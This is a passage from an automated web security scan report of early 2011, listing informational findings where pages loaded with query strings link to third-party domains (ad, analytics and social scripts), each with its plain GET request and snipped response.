20.693. http://www.lynda.com/landing/softwaretraining.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.lynda.com/landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/
The response contains the following link to another domain:
  • https://lct.salesforce.com/sfga.js

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw4CYMO; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
X-Powered-By: ASP.NET
From: 284440-web4
Date: Tue, 25 Jan 2011 04:43:19 GMT
Connection: close
Content-Length: 24612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
</BODY> tag -->
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

20.694. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mensfitness.com
Path:   /Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136?cid=RSS
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?
  • http://ad.doubleclick.net/ad/ami.mf.home/;sz=300x90;tile=10;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?
  • http://ad.doubleclick.net/jump/ami.mf.home/;sz=300x90;tile=10;ord=123456789?
  • http://b.scorecardresearch.com/b?c1=2&c2=6036076&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
  • http://coedmagazine.com/2011/01/14/5-things-girls-want-you-to-do-without-asking-renatas-recos/
  • http://digg.com/MensFitness
  • http://digg.com/users/MensFitness
  • http://edge.quantserve.com/quant.js
  • http://js.adsonar.com/js/adsonar.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js
  • http://pixel.quantserve.com/pixel/p-94wNw88f65Rhk.gif?labels=MTVN%20Digital%20Tribes
  • http://pixel.quantserve.com/pixel/p-b0iPm4Hn8ATss.gif
  • http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-mensfitness&cg=0&cc=1
  • http://secure-us.imrworldwide.com/v53.js
  • http://twitter.com/mens_fitness
  • http://well.blogs.nytimes.com/2011/01/12/the-hazards-of-the-couch/?src=me&ref=health
  • http://www.americanmediainc.com/
  • http://www.americanmediainc.com/brand/mens-fitness
  • http://www.askmen.com/fashion/fashiontip_600/660_sweatproof-your-clothes-sachin-on-fashion.html
  • http://www.countryweekly.com/
  • http://www.facebook.com/mensfitness
  • http://www.fitpregnancy.com/
  • http://www.flexonline.com/
  • http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy
  • http://www.heavy.com/mma/mma-news/2011/01/why-the-ufc-supports-the-intrepid-fallen-heroes-fund/
  • http://www.muscleandfitness.com/
  • http://www.muscleandfitnesshers.com/
  • http://www.myspace.com/mens_fitness
  • http://www.nationalenquirer.com/
  • http://www.naturalhealthmag.com/
  • http://www.shape.com/
  • http://www.shape.com/lifestyle/entertainment-and-celebrities/top-bikini-models-of-all-time-where-are-they-now
  • http://www.spike.com/tribes/
  • http://www.starmagazine.com/
  • http://www.stephenbailey.com/life/business/why-is-aol-killing-asylum-com/
  • http://www.thesmokingjacket.com/entertainment/martin-luther-king-history
  • https://w1.buysub.com/loc/MTS/ccare
  • https://w1.buysub.com/loc/MTS/footer
  • https://w1.buysub.com/loc/MTS/gift
  • https://w1.buysub.com/loc/MTS/renew
  • https://w1.buysub.com/loc/MTS/subscribe

Request

GET /Tshirt_Workout/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:05 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43200
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:45:05 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45331

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>


<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
</a> | <a href="http://www.facebook.com/mensfitness" target="_blank">facebook</a> | <a href="http://www.myspace.com/mens_fitness" target="_blank">myspace</a> | <a href="http://digg.com/users/MensFitness" target="_blank">digg</a> | <a href="http://twitter.com/mens_fitness" target="_blank">twitter</a>
...[SNIP]...
<li><a href="http://www.myspace.com/mens_fitness" target="_blank">MF on MySpace</a>
...[SNIP]...
<li><a href="http://www.facebook.com/mensfitness" target="_blank">MF on Facebook</a>
...[SNIP]...
<li><a href="http://digg.com/users/MensFitness" target="_blank">MF on Digg</a>
...[SNIP]...
<li><a href="http://twitter.com/mens_fitness" target="_blank">MF on Twitter</a>
...[SNIP]...
<div align="center" id="left_subscribe_links">
   <a href="https://w1.buysub.com/loc/MTS/subscribe" target="_blank">Subscribe</a> | <a href="https://w1.buysub.com/loc/MTS/renew" target="_blank">Renew</a><br>
   <a href="https://w1.buysub.com/loc/MTS/gift" target="_blank">Give a Gift</a> | <a href="https://w1.buysub.com/loc/MTS/ccare" target="_blank">Service</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=1;aid=136;dcopt=ist;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=1020x200;tile=9;aid=136;ord=123456789?" width="1020" height="200" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=160x600;tile=2;aid=136;ord=123456789?" width="160" height="600" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=6;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=7;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=120x90;tile=8;aid=136;ord=123456789?" width="120" height="90" border="0" alt=""></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a> <a href="http://twitter.com/mens_fitness" target="_blank" title="Twitter"><img src="/site/images/contact/contact-twitter-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://www.facebook.com/mensfitness" target="_blank" title="Facebook"><img src="/site/images/contact/contact-facebook-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://www.myspace.com/mens_fitness" target="_blank" title="MySpace"><img src="/site/images/contact/contact-myspace-45.gif" alt="" width="45" height="45" border="0"></a> <a href="http://digg.com/MensFitness" target="_blank" title="Digg"><img src="/site/images/contact/contact-digg-45.gif" alt="" width="45" height="45" border="0">
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250;tile=3;aid=136;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.home/;sz=300x90;tile=10;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.home/;sz=300x90;tile=10;ord=123456789?" width="300" height="90" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=300x250,300x600;tile=4;aid=136;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<strong><a href="http://www.thesmokingjacket.com/entertainment/martin-luther-king-history" target="_blank">Martin Luther King, Jr.</a>
...[SNIP]...
<strong><a href="http://www.askmen.com/fashion/fashiontip_600/660_sweatproof-your-clothes-sachin-on-fashion.html" target="_blank">Sweating A Lot?</a>
...[SNIP]...
<strong><a href="http://coedmagazine.com/2011/01/14/5-things-girls-want-you-to-do-without-asking-renatas-recos/" target="_blank">5 Things Girls Want</a>
...[SNIP]...
<strong><a href="http://well.blogs.nytimes.com/2011/01/12/the-hazards-of-the-couch/?src=me&ref=health" target="_blank">The Hazards of the Couch</a>
...[SNIP]...
<strong><a href="http://www.heavy.com/mma/mma-news/2011/01/why-the-ufc-supports-the-intrepid-fallen-heroes-fund/" target="_blank">Fight for the Troops</a>
...[SNIP]...
<strong><a href="http://www.stephenbailey.com/life/business/why-is-aol-killing-asylum-com/" target="_blank">Asylum.com Being Shut Down</a>
...[SNIP]...
<strong><a href="http://www.shape.com/lifestyle/entertainment-and-celebrities/top-bikini-models-of-all-time-where-are-they-now" target="_blank">Top Bikini Models of All-Time</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ami.mf.fitness/abs;sz=728x90;tile=5;aid=136;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> |
<a href="https://w1.buysub.com/loc/MTS/footer">Subscribe</a>
...[SNIP]...
</a> |
<a href="http://www.americanmediainc.com/brand/mens-fitness" target="_blank"> Advertising Information</a>
...[SNIP]...
<br>
&copy; 2011 Weider Publications, LLC, a subsidiary of <a href="http://www.americanmediainc.com" target="_new">American Media, Inc.</a>
...[SNIP]...
<br>
Mensfitness.com is a member of the <a href="http://www.spike.com/tribes/" target="_blank">MTVN Tribes</a> anchored by MTVN properties like <a href="http://www.spike.com/tribes/" target="_blank">Spike</a>
...[SNIP]...
</strong> <a href="http://www.fitpregnancy.com" target="_blank">Fit Pregnancy</a> | <a href="http://www.flexonline.com" target="_blank">Flex</a>
...[SNIP]...
</a> | <a href="http://www.muscleandfitness.com" target="_blank">Muscle &amp; Fitness</a> | <a href="http://www.muscleandfitnesshers.com" target="_blank">Muscle &amp; Fitness Hers</a> | <a href="http://www.naturalhealthmag.com" target="_blank">Natural Health</a> | <a href="http://www.shape.com" target="_blank">Shape</a>
...[SNIP]...
</strong> <a href="http://www.countryweekly.com" target="_blank">Country Weekly</a> | <a href="http://www.nationalenquirer.com" target="_blank">National Enquirer</a> | <a href="http://www.starmagazine.com" target="_blank">Star</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-94wNw88f65Rhk.gif?labels=MTVN%20Digital%20Tribes" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b0iPm4Hn8ATss.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<div><img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-mensfitness&amp;cg=0&cc=1" alt="" style="display:none;"/></div>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6036076&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<!-- Begin Crazy Egg -->
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

20.695. http://www.mindbodygreen.com/passvote.action

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindbodygreen.com
Path:   /passvote.action

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.mindbodygreen.com/passvote.action?u={u}
The response contains the following links to other domains:
  • http://edge.quantserve.com/quant.js
  • http://itunes.apple.com/us/podcast/mindbodygreen/id367278016
  • http://pixel.quantserve.com/pixel/p-eaiFKB6Cvl1QU.gif
  • http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1
  • http://www.facebook.com/css/connect/connect_button.css
  • http://www.google-analytics.com/urchin.js
  • http://www.youtube.com/user/MindBodyGreen

Request

GET /passvote.action?u={u} HTTP/1.1
Host: www.mindbodygreen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Date: Tue, 25 Jan 2011 04:46:05 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/wc.css;jsessionid=BF3B61587E947D9656BC99171A41E74D">
<link rel="stylesheet" type="text/css" href="http://www.facebook.com/css/connect/connect_button.css" />
<link rel="Shortcut Icon" href="/favicon.ico;jsessionid=BF3B61587E947D9656BC99171A41E74D">
<script src="http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1" type="text/javascript"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<div id="youtube" style="text-align:center">
<a href="http://www.youtube.com/user/MindBodyGreen" target="_blank"><img src="/images/youtube-logo.jpg;jsessionid=BF3B61587E947D9656BC99171A41E74D" style="height:49px">
...[SNIP]...
</a>
<a href="http://itunes.apple.com/us/podcast/mindbodygreen/id367278016" target="_blank"><img src="/images/itunes-logo.jpg;jsessionid=BF3B61587E947D9656BC99171A41E74D" style="width:140px">
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-eaiFKB6Cvl1QU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

20.696. http://www.mister-wong.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.mister-wong.com/index.php?action=addurl&bm_url={u}&bm_description={t}
The response contains the following links to other domains:
  • http://enimages2.websnapr.com/?size=S&url=
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s3.trafficmaxx.de/thx.php?sid=5f56e4f655419e1d43a94517aa3587aa&java=no&conversionName=&pageCategory=
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/
  • http://static.mister-wong.de/mootools-1.2-core-more.js
  • http://www.mister-wong.cn/
  • http://www.mister-wong.de/
  • http://www.mister-wong.es/
  • http://www.mister-wong.fr/
  • http://www.mister-wong.ru/

Request

GET /index.php?action=addurl&bm_url={u}&bm_description={t} HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:45 GMT
Server: Apache
Set-Cookie: wongsess=927d30d84dbc263a02394b9ef968dec9; expires=Fri, 25 Jan 2036 10:46:45 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<link href="/ccss/default.css,buddys.css,dropdown.css,users.css,autocompleter.css,spotlight.css,remooz.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="http://static.mister-wong.de/mootools-1.2-core-more.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h1>

   <img src="http://enimages2.websnapr.com/?size=S&amp;url=" alt="" class="websnapr" />
   
   <div id="ratemenow" style="width:466px; float:left;">
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<li><a href="http://www.mister-wong.de">de</a></li><li><a href="http://www.mister-wong.fr">fr</a></li><li><a href="http://www.mister-wong.es">es</a></li><li><a href="http://www.mister-wong.ru">ru</a></li><li><a href="http://www.mister-wong.cn">cn</a>
...[SNIP]...
</div>
                       <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/" type="text/javascript"></script>
...[SNIP]...
<noscript style="display: none">
   <img src="http://s3.trafficmaxx.de/thx.php?sid=5f56e4f655419e1d43a94517aa3587aa&amp;java=no&amp;conversionName=&amp;pageCategory=" alt="" />
</noscript>
...[SNIP]...

20.697. http://www.netscape.com/submit/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netscape.com
Path:   /submit/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.netscape.com/submit/?U={u}&T={t}
The response contains the following link to another domain:
  • http://netscape.aol.com/

Request

GET /submit/?U={u}&T={t} HTTP/1.1
Host: www.netscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 05:03:49 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Tue, 25 Jan 2011 05:33:49 GMT
Content-length: 89
Content-type: text/html
Location: http://netscape.aol.com
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://netscape.aol.com">here.</a>
</body>
</html>

20.698. http://www.newsvine.com/_wine/save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_wine/save

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.newsvine.com/_wine/save?u={u}&h={t}
The response contains the following links to other domains:
  • http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css
  • http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
  • http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
  • http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
  • http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_wine/save?u={u}&h={t} HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:02:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=da7a4ec87a220913a1e87eace30dd98e; expires=Mon, 20-Jan-2031 05:02:58 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave%3Fu%3D%7Bu%7D%26h%3D%7Bt%7D
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
...[SNIP]...

20.699. http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexternal.com
Path:   /ecommerce/joomla-shopping-cart.asp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp?source=google/
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://docs.joomla.org/
  • http://hc2.humanclick.com/hc/81994923/?cmd=file&file=visitorWantsToChat&site=81994923&byhref=1&imageUrl=http://hc2.humanclick.comhttps://www.nexternal.com/images/
  • http://twitter.com/nexternal
  • http://www.joomla.org/

Request

GET /ecommerce/joomla-shopping-cart.asp?source=google/ HTTP/1.1
Host: www.nexternal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:03 GMT
Server: SERVER
Set-Cookie: homepagelog%5Fid=16003527; expires=Tue, 08-Jan-2013 08:00:00 GMT; path=/
Set-Cookie: SQL=; path=/
P3P: CP="NOI DSP COR CURa OUR NOR"
Cache-control: private
Content-Length: 17852
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Co
...[SNIP]...
</a> has the ability to easily integrate with <a href="http://www.joomla.org" target="joomla">Joomla.s</a>
...[SNIP]...
-of-use and extensibility, have made Joomla one of the most popular website software applications available. Best of all, Joomla is freely available and the latest version can easily be downloaded at <a href="http://www.joomla.org" target="joomla">www.joomla.org</a>
...[SNIP]...
<p>
Utilizing a CMS such as <a href="http://www.joomla.org" target="joomla">Joomla</a>
...[SNIP]...
<p>
If you need assistance with setting up your Joomla website, Joomla provides extensive <a href="http://docs.joomla.org" target="joomla">documentation</a> for you to use. You can also utilize <a href="http://community.joomla.org/" target="joomla">Joomla's Customer Community</a>
...[SNIP]...
<br /><a href='http://hc2.humanclick.com/hc/81994923/?cmd=file&file=visitorWantsToChat&site=81994923&byhref=1&imageUrl=http://hc2.humanclick.comhttps://www.nexternal.com/images/' target='chat81994923' onClick="javascript:window.open('http://hc2.humanclick.com/hc/81994923/?cmd=file&file=visitorWantsToChat&site=81994923&imageUrl=http://hc2.humanclick.comhttps://www.nexternal.com/images/&referrer='+escape(document.location),'chat81994923','width=472,height=320,resizable=yes');return false;"><img src="https://www.nexternal.com/images/button_chat2.jpg" alt="Chat Now with an ECommerce Expert" style="margin: 14px 0 5px 0;" width="86" border="0" height="22" />
...[SNIP]...
</script>
<a id="twitter" href="http://twitter.com/nexternal" title="Nexternal on Twitter" target="twitter"><img src="http://www.nexternal.com/images/twitter_icon_2.gif" alt="Nexternal on Twitter" width="16" height="16" border="0" />
...[SNIP]...

20.700. http://www.officedepot.com/promo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /promo.do

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.officedepot.com/promo.do?file=/promo/pages/0928_recycling.jsp
The response contains the following links to other domains:
  • http://feeds.feedburner.com/OfficeDepot
  • http://officedepot.lifepics.com/net/Default.aspx?SID=null&odserver=www.officedepot.com
  • http://officedepot.logoworks.com/?source=od.l7&SID=null&odserver=www.officedepot.com
  • http://static.atgsvcs.com/js/atgsvcs.js
  • http://static.www.odcdn.com/1421577119/bundles/cm.js
  • http://static.www.odcdn.com/1481705167/css/od/speciallinks.css
  • http://static.www.odcdn.com/1485153267/includes/customerservice.js
  • http://static.www.odcdn.com/N136538418/bundles/lib.js
